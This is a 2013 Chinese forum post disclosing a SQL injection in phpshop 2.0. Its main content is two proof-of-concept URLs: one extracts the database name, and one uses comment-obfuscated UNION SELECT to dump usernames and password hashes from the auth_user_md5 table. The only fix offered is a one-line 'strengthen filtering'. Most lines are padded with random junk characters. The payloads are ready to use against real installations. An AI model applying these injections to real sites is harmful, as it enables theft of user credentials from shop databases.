标题 : phpshop 2.0 SQL Injection Vulnerability# Y3 C. F4 e1 i! ^9 l* i! `
! s! W9 Z1 s7 z: k" g: `0 ]2 i
作者 : By onestree
) t: S, a2 ?" t$ C. p下载地址 : http://code.google.com/p/phpshop/downloads/list. l4 P' {3 L2 x
测试地址: windows 7 / ubuntu4 \) ]; l* n% p% B
% W; Q! _) h3 S/ l0 |/ w' S
) M V! B0 ~0 sSQLi p0c:+ K; W2 F6 H. U" z6 L/ u
6 M2 H% a% ^. b! S$ s
==================9 O7 Q% C: l2 u* n
; m1 ?) W9 x' V
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
" R" g, R8 w, `3 r# Z3 lunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --4 w' h. W4 k- P6 k1 ^3 ^
8 D& ~, R! v2 @& B
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5-- f9 W$ o3 `. n% k: k# o
N3 T0 t9 X$ |8 z" B修复:5 S9 v# V- I- N" @& x0 ~
加强过滤
6 X" B; C- r s+ Y$ e# F
" Q1 {, c3 ^% \. ^3 v$ d1 b2 }$ b
9 o% m" ~! v- r$ l% ^9 n5 N! _ |
发表于 2013-1-18 18:24:10
收藏
支持
反对